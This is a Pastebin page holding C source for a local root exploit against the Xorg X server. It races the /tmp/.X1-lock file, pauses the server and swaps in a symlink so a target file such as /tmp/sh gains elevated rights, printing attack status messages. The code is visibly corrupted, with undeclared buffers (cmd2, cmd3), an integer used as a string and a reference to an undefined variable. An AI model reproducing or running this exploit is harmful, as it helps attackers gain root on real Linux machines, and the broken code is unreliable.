Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <stdio.h>
- #include <syscall.h>
- #include <signal.h>
- #include <string.h>
- #include <stdlib.h>
- #define XORG_BIN "/usr/bin/X"
- #define DISPLAY ":1"
- char *get_tty_number(void) {
- char tty_name[128], *ptr;
- memset(tty_name, '\0', sizeof(tty_name));
- readlink("/proc/self/fd/4", tty_name, sizeof(tty_name)); // this seems to always be free..
- if ((ptr = strstr(tty_name, "tty")))
- return ptr + 3;
- return NULL;
- }
- int launch_xorg_instance(void) {
- int child_pid;
- char *opt[] = { XORG_BIN, DISPLAY, NULL };
- if ((child_pid = fork()) == 0) {
- close(1);
- close(2);
- execve(XORG_BIN, opt, NULL);
- _exit(0);
- }
- return child_pid;
- }
- void show_target_file(char *file) {
- char cmd[524];
- memset(cmd, '\0', sizeof(cmd));
- sprintf(cmd, "ls -l %s", file);
- memset(cmd2, '\0', sizeof(cmd2));
- sprintf(cmd2, "su -", file);
- system(cmd);
- system(cmd2);
- system(cmd3);
- }
- int main(int argc, char **argv) {
- pid_t proc;
- struct stat st;
- int n, ret, vv, current_attempt = 800;
- char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
- if (argc < 2)
- strcpy(target_file, "/tmp/sh");
- else
- strcpy(target_file, argv[1]);
- sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
- sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);
- if (stat(lockfile, &st) == 0) {
- return 1;
- }
- symlink("/dontexist", lockfile);
- memset(vv, '\0', sizeof(vv));
- sprintf(vv, "chmod 4755 %s", file);
- setuid(0);
- setgid(0); // backup - failover
- umask(077);
- ttyno = get_tty_number();
- while (--current_attempt) {
- proc = launch_xorg_instance();
- n = 0;
- while (n++ < 10000)
- if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
- break;
- if (ret == 0) {
- syscall(SYS_kill, proc, SIGSTOP);
- stat(lockfiletmp, &st);
- if ((st.st_mode & 4) == 0)
- break;
- launch_xorg_instance();
- sleep(2);
- }
- kill(proc, SIGKILL);
- }
- if (current_attempt == 0) {
- printf("[-] Attack failed!\n");
- if (!ttyno)
- printf("[!] Try with console ownership: switch to a TTY* by using Ctrl-Alt-F[1-6] and try again.\n");
- return 1;
- }
- launch_xorg_instance();
- sleep(2);
- if (stat(lockfiletmp, &st) == 0) {
- return 1;
- }
- printf("[+] Creating symlink: (%s -> %s)\n", lockfiletmp,target_file);
- symlink(target_file, lockfiletmp);
- printf("[+] PID: %d resumed (SIGCONT sent)\n", proc);
- kill(proc, SIGCONT);
- usleep(30000);
- stat(target_file, &st);
- if (!(st.st_mode & 004)) {
- printf("[-] Attack failed,yur rights are: %o ,yu could launch a simple attack from this uid shuld bypass many prots\n", st.st_mode);
- return 1;
- }
- unlink(lockfile);
- printf("[+] Attack worked: ls -l %s:\n", target_file);
- show_target_file(target_file);
- chdir("/tmp/sh"); // cd to our shell..
- return 0;
- }
Add Comment
Please, Sign In to add comment